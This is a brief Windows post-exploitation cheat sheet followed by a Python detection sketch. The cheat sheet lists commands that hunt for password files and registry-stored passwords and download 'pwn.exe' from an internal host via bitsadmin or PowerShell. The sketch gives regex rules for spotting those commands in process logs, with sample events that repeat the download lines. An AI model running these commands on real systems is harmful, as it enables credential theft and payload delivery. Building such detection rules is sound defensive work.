Dump directory listing
dir /b /a /s c:\ > dirlist
Filter for “passw” (case-insensitive)
findstr /i passw
Download file with bitsadmin
bitsadmin /transfer job1 /download http://192.168.1.5/pwn.exe %cd%\pwn.exe
Download file with PowerShell
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.5/pwn.exe', '%cd%\pwn.exe')"
Search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
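
Seen from the detection side, each command above leaves a recognizable command line in process-creation logs (Security event 4688 with command-line auditing, or Sysmon event 1). The sketch below is an added example, not part of the original cheat sheet: the rule names, host names and sample events are constructed, and the regexes are assumptions tuned to the exact command shapes listed here.

```python
import re

# One rule per command shape listed on this page (rule names are hypothetical).
# Note: dir is a cmd.exe builtin, so it is only logged when run as "cmd /c dir ...".
RULES = {
    "recursive_dir_dump": re.compile(
        r"\bdir\b(?=.*\s/s\b).*\s[a-z]:\\\s*(>|$)", re.I),
    "findstr_password_hunt": re.compile(
        r"\bfindstr(\.exe)?\b.*\bpassw", re.I),
    "bitsadmin_download": re.compile(
        r"\bbitsadmin(\.exe)?\b.*/transfer\b.*/download\b", re.I),
    "powershell_webclient_download": re.compile(
        r"\bpowershell(\.exe)?\b.*net\.webclient.*\.downloadfile\(", re.I),
    "registry_password_search": re.compile(
        r"\breg(\.exe)?\s+query\s+hk(lm|cu)\b.*/f\s+\S*passw\S*.*/s\b", re.I),
}

def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def hosts_chaining(events, min_rules=2):
    """Hosts where at least min_rules distinct rules fired.

    A single hit (an admin running reg query) is weak evidence; several
    different rules on one host is the pattern worth triaging first.
    """
    per_host = {}
    for host, cmdline in events:
        per_host.setdefault(host, set()).update(classify(cmdline))
    return sorted(h for h, names in per_host.items() if len(names) >= min_rules)

# Constructed sample events: (host, command line). Addresses and paths are made up.
SAMPLE = [
    ("WS01", r"cmd.exe /c dir /b /a /s c:\ > dirlist"),
    ("WS01", r"findstr /i passw dirlist"),
    ("WS01", r"bitsadmin /transfer job1 /download http://192.0.2.10/tool.exe C:\Temp\tool.exe"),
    ("WS01", r'''powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10/tool.exe', 'C:\Temp\tool.exe')"'''),
    ("WS01", r"reg query HKLM /f password /t REG_SZ /s"),
    ("WS02", r"cmd.exe /c dir /s c:\Users\bob\Documents"),
    ("WS02", r"findstr /i error C:\Logs\app.log"),
    ("WS02", r"reg query HKLM\Software\Microsoft /v Version"),
]

if __name__ == "__main__":
    for host, cmd in SAMPLE:
        print(host, classify(cmd), cmd)
    print("hosts chaining multiple rules:", hosts_chaining(SAMPLE))
```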